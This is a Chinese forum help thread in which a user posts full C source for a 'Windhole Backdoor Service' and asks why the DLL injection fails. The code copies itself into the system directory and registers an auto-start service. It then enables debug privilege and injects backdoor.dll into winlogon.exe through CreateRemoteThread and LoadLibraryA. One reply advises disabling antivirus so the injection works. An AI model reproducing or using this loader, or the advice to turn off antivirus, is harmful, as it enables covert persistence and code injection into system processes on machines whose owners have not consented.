首页
社区
课程
招聘
[旧帖] [求助]dll注入的问题 0.00雪花
发表于: 2008-2-28 15:50 4692

[旧帖] [求助]dll注入的问题 0.00雪花

2008-2-28 15:50
4692
近来看了一个网上经典的Dll注入的例子,拷下来运行了一下 好不容易调通了,最后还是不能正常注入,找不到原因,求救一个各位大牛看一下 帮帮我!!谢谢了
注入程序如下,在xp vc6.0调试通过
/*---------------------------------------------------------------------
//mysvr.c
//Coder: sjdf
//E-mail: sjdf1@163.com
//Create date: 2002.8.11
//Last modify date: 2003.10.28
//Test platform: Win2000 Adv Server + sp4
---------------------------------------------------------------------*/
//Header
//#include "bkdlldata.h" // maoge注释掉了
#include <stdio.h>
#include <string.h>
#include <windows.h>
// #include <psapi.h>
#include "PSAPI.H"
#include <winsvc.h>
#pragma comment(lib, "psapi.Lib") // maoge添加的。[maoge注]
//---------------------------------------------------------------------
//Global constant
char       SERVICENAME[9]  = "windhole";
const char DISPLAYNAME[33] = "Windhole Backdoor Service";
const char SRVFILENAME[13] = "windhole.exe";
const char BDRFILENAME[13] = "backdoor.dll";
const char DESTPROC[19]    = "winlogon.exe"; // 注:本系统进程注入DLL文件后与常规的进程
            // 不一样,需要特殊处理,你可以试一试其它进
            // 程,如exeplorer.exe。[maoge注]
//---------------------------------------------------------------------
//Glabal variable
SERVICE_STATUS MyServiceStatus;
SERVICE_STATUS_HANDLE MyServiceStatusHandle;
int WillStop = 0;
//---------------------------------------------------------------------
//Function declaration
int AddPrivilege(const char *Name);
void MyServiceStart (int argc, char *argv[]);
void MyServiceCtrlHandler (DWORD opcode);
DWORD MyWrokThread(void);
DWORD ProcessToPID(const char *InputProcessName);
//---------------------------------------------------------------------
//Function definition
int main(int argc,char *argv[])
{
//如果参数为“-service”就作为服务启动
if ((argc >= 2) && (!lstrcmp(argv[1],"-service")))
{
  SERVICE_TABLE_ENTRY DispatchTable[] =
  {
   {SERVICENAME, (LPSERVICE_MAIN_FUNCTION)MyServiceStart},
   {NULL, NULL}
  };
  
  if (!StartServiceCtrlDispatcher( DispatchTable))
  {
   return 1;
  }
  
  return 0;
}

//否则就自动安装服务
//复制自身到系统目录
char DestName[MAX_PATH + 1];
char NowName[MAX_PATH + 1];

ZeroMemory(DestName,MAX_PATH + 1);
ZeroMemory(NowName,MAX_PATH + 1);

if (!GetSystemDirectory(DestName,MAX_PATH))
{
  printf("GetSystemDirectory() error = %d\nInstall failure!\n",GetLastError());
  return 1;
}

lstrcat(DestName,"\\");
lstrcat(DestName,SRVFILENAME);

if (!GetModuleFileName(NULL,NowName,MAX_PATH))
{
  printf("GetModuleFileName() error = %d\nInstall failure!\n",GetLastError());
  return 1;
}

if (!CopyFile(NowName,DestName,0))
{
  printf("CopyFile() error = %d\nInstall failure!\n",GetLastError());
  return 1;
}

//安装服务
SC_HANDLE newService, scm;
//连接SCM
if (!(scm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE)))
{
  printf("OpenSCManager() error = %d\nInstall failure!\n",GetLastError());
  return 1;
}

//当作为服务启动时加上“-service”参数
lstrcat(DestName," -service");

if (!(newService = CreateService(scm,
  SERVICENAME,
  DISPLAYNAME,
  SERVICE_ALL_ACCESS,
  SERVICE_WIN32_OWN_PROCESS,
  SERVICE_AUTO_START,
  SERVICE_ERROR_NORMAL,
  DestName,
  NULL, NULL, NULL, NULL, NULL)))
{
  printf("CreateService() error = %d\nInstall failure!\n",GetLastError());
}
else
{
  printf("Install success!\n");
  
  char *pra[] = {"-service", "\0"};
  
  if (!StartService(newService,1,(const char **)pra))
  {
   printf("StartService() error = %d\nStart service failure!\n",GetLastError());
  }
  else
  {
   printf("Start service Success!\n");
  }
  
}

CloseServiceHandle(newService);
CloseServiceHandle(scm);
return 0;

}
//---------------------------------------------------------------------
DWORD MyWorkThread(void)
{
Sleep(4000);

FILE *fp;

if ((fp = fopen(BDRFILENAME,"rb")) == NULL) // "wb"更改成了"rb",以表示只读,
{           // 否则会重写backdoor.dll。[maoge注]
  WillStop = 1;
  return 1;
}
// 以下五行maoge给注释掉了,几乎是没什么用处。[maoge注]
/*
fwrite(data1,sizeof(data1),1,fp);
fwrite(data2,sizeof(data2),1,fp);
fwrite(data3,sizeof(data3),1,fp);
fwrite(data4,sizeof(data4),1,fp);
fwrite(data5,sizeof(data5),1,fp);
*/
fclose(fp);

char FullName[MAX_PATH + 1];

ZeroMemory(FullName,MAX_PATH + 1);
GetSystemDirectory(FullName,MAX_PATH);
lstrcat(FullName,"\\");
lstrcat(FullName,BDRFILENAME);

//如果是要打开系统进程,一定要先申请debug权限
AddPrivilege(SE_DEBUG_NAME);

HANDLE hRemoteProcess = NULL;
DWORD Pid = ProcessToPID(DESTPROC);

    if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许远程创建线程
        PROCESS_VM_OPERATION |         //允许远程VM操作
        PROCESS_VM_WRITE |          //允许远程VM写
        PROCESS_VM_READ,          //允许远程VM读
        0,
        Pid)) == NULL)
    {
  WillStop = 1;
  return 1;
    }
    char *pDllName = NULL;

    if ((pDllName = (char *)VirtualAllocEx( hRemoteProcess,
        NULL,
        lstrlen(FullName) + 1,
        MEM_COMMIT,
        PAGE_READWRITE)) == NULL)
    {
  CloseHandle(hRemoteProcess);
  WillStop = 1;
        return 1;
    }

    //使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间
    if (WriteProcessMemory(hRemoteProcess,
        pDllName,
        FullName,
        lstrlen(FullName),
        NULL) == 0)
    {
  VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
  CloseHandle(hRemoteProcess);
        WillStop = 1;
  return 1;
    }

    //计算LoadLibraryA的入口地址
    PTHREAD_START_ROUTINE pfnStartAddr = NULL;

    if ((pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(
        GetModuleHandle(TEXT("kernel32")), "LoadLibraryA")) == NULL)
    {
  VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
  CloseHandle(hRemoteProcess);
        WillStop = 1;
  return 1;
    }

    DWORD ThreadId = 0;

CreateRemoteThread(hRemoteProcess, //被嵌入的远程进程
  NULL,
  0,
  pfnStartAddr,     //LoadLibraryA的入口地址
  pDllName,
  0,
  &ThreadId);

CloseHandle(hRemoteProcess);
    WillStop = 1;
return 0;
}
//---------------------------------------------------------------------
void MyServiceStart (int argc, char *argv[])
{
if (!(MyServiceStatusHandle = RegisterServiceCtrlHandler(SERVICENAME,(LPHANDLER_FUNCTION)MyServiceCtrlHandler)))
{
  return;
}

MyServiceStatus.dwServiceType = SERVICE_WIN32;
MyServiceStatus.dwCurrentState = SERVICE_START_PENDING;
MyServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwServiceSpecificExitCode = 0;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;

if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
  return;
}

DWORD Threadid;

// Initialization code goes here. Handle error condition
if (!CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)MyWorkThread,NULL, 0, &Threadid))
{
  MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
  MyServiceStatus.dwCheckPoint = 0;
  MyServiceStatus.dwWaitHint = 0;
  MyServiceStatus.dwWin32ExitCode = GetLastError();
  MyServiceStatus.dwServiceSpecificExitCode = GetLastError();
  
  SetServiceStatus(MyServiceStatusHandle, &MyServiceStatus);
  return;
}

// Initialization complete - report running status.
MyServiceStatus.dwCurrentState = SERVICE_RUNNING;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;

if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
  return;
}

while(WillStop == 0)
{
  Sleep(200);
}

MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;

SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus);
return;
}
//---------------------------------------------------------------------
void MyServiceCtrlHandler (DWORD Opcode)
{
switch(Opcode)
{
case SERVICE_CONTROL_PAUSE:
  // Do whatever it takes to pause here.
  MyServiceStatus.dwCurrentState = SERVICE_PAUSED;
  break;
  
case SERVICE_CONTROL_CONTINUE:
  // Do whatever it takes to continue here.
  MyServiceStatus.dwCurrentState = SERVICE_RUNNING;
  break;
  
case SERVICE_CONTROL_STOP:
  // Do whatever it takes to stop here.
  MyServiceStatus.dwWin32ExitCode = 0;
  MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
  MyServiceStatus.dwCheckPoint = 0;
  MyServiceStatus.dwWaitHint = 0;
  
  SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus);
  
  WillStop = 1;
  return;
  
case SERVICE_CONTROL_INTERROGATE:
  // Fall through to send current status.
  break;
  
}

// Send current status.
if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
  return;
}

return;
}
//---------------------------------------------------------------------
//为当前进程增加指定的特权
int AddPrivilege(const char *Name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID Luid;

if (!OpenProcessToken(GetCurrentProcess(),
  TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
  &hToken))
{
  printf("OpenProcessToken error.\n");
  return 1;
}

if (!LookupPrivilegeValue(NULL,Name,&Luid))//修改系统进程权限
{
  printf("LookupPrivilegeValue error.\n");
  return 1;
}

tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = Luid;

if (!AdjustTokenPrivileges(hToken, //通知系统修改进程权限
  0,
  &tp,
  sizeof(TOKEN_PRIVILEGES),
  NULL,
  NULL))
{
  printf("AdjustTokenPrivileges error.\n");
  return 1;
}

return 0;
}
//---------------------------------------------------------------------
//将进程名转换为PID的函数
DWORD ProcessToPID(const char *InputProcessName)
{
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
HANDLE hProcess = NULL;
HMODULE hMod = NULL;
char szProcessName[MAX_PATH] = "UnknownProcess";

AddPrivilege(SE_DEBUG_NAME);

// 计算目前有多少进程, aProcesses[]用来存放有效的进程PIDs
if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
{
  return 0;
}

cProcesses = cbNeeded / sizeof(DWORD);
// 按有效的PID遍历所有的进程
for ( i = 0; i < cProcesses; i++ )
{
  // 打开特定PID的进程
  hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
   PROCESS_VM_READ,
   FALSE, aProcesses[i]);
  // 取得特定PID的进程名
  if ( hProcess )
  {
   if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
   {
    GetModuleBaseName( hProcess, hMod,
     szProcessName, sizeof(szProcessName) );
    //将取得的进程名与输入的进程名比较,如相同则返回进程PID
    if(!stricmp(szProcessName, InputProcessName))
    {
     CloseHandle( hProcess );
     return aProcesses[i];
    }
   }
  }//end of if ( hProcess )
}//end of for
//没有找到相应的进程名,返回0
CloseHandle( hProcess );
return 0;
}
//--------------------------------

dll程序如下
/*****************************************************

//backdoor.cpp
//Provider: rxxi
//E-mail: rxxi@sohu.com
//Date: 2006.4.27
// Compiled in WinXP SP2

******************************************************/
#include <windows.h>
#include <stdio.h>

// void SysReboot();

BOOL APIENTRY DllMain(HANDLE hModule, DWORD reason, LPVOID lpReserved)
{
char szProcessId[64];
switch (reason)
{
case DLL_PROCESS_ATTACH:
  {
   //获取当前进程ID
   _itoa(GetCurrentProcessId(), szProcessId, 10);
   int ret = MessageBox(NULL, szProcessId, "backdoor.dll", MB_OK);
   if (ret != 0)
   {
    MessageBox(NULL, 0, "系统重启", MB_OK);
    //SysSysReboot();
    return TRUE;
   }
  }
default:
  return TRUE;
}
}
完毕。

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (6)
雪    币: 217
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
那位大侠可以帮一下忙呢,
2008-2-28 19:03
0
雪    币: 217
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
怎么没有人帮一下我呢,呜呜呜呜
2008-3-3 16:24
0
雪    币: 217
活跃值: (10)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
4
你想注入什么dll,我帮你注入进去.
2008-3-3 19:39
0
雪    币: 217
活跃值: (10)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
5
加我qq736354396
2008-3-3 19:40
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
可能会被封帖
2008-3-4 00:02
0
雪    币: 14
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
hup
7
把瑞星之类的杀毒软件关掉,再试试
2008-3-4 21:37
0
游客
登录 | 注册 方可回帖
返回
//